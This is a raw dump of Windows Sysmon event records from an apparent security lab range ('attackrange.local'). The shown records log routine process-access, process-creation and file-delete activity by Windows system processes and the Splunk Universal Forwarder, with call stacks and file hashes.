23542300x80000000000000001061915Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:21.042{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5DDA18502D6CC05DA0A6587101814FE,SHA256=69D827399A948A93819EDDE0F37ECBF0C5D96FEFC050E2FB3F39C20E8435E152,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246587Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-52D1-6063-CE22-00000000AF01}620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246586Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246585Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246584Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246583Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246582Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246581Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246580Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246579Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246578Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246577Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-304A-6062-0500-00000000AF01}392936C:\Windows\system32\csrss.exe{CB4067E1-52D1-6063-CE22-00000000AF01}620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246576Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.618{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-52D1-6063-CE22-00000000AF01}620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246575Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.619{CB4067E1-52D1-6063-CE22-00000000AF01}620C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246574Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.399{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E598B035F6B4EC5C57FF9F7E0CFB0E7,SHA256=26776DB1F891D21ED6ADCE8228D35E8F790222F7337FC8C3AAB90CC5314B6CB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246573Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.399{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A099B59A32E7E7C10D16476CC13A3ED7,SHA256=1F6109A08A05A10F7F25ACA911C69EB79577ECCA66E95D38C340E6CEC0898873,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246572Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.148{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86FB2E372EA5F7D9C8A462567B8ED786,SHA256=15381D2690E34F256FDB03C5D0EB2C81019F0FCC38025D20179D5EAB201E0DF9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246571Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:21.070{CB4067E1-52D0-6063-CD22-00000000AF01}35882880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246618Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.990{CB4067E1-52D2-6063-D022-00000000AF01}31203752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246617Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-52D2-6063-D022-00000000AF01}3120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246616Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246615Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246614Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246613Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246612Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246611Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246610Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246609Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:22.881{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246608Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 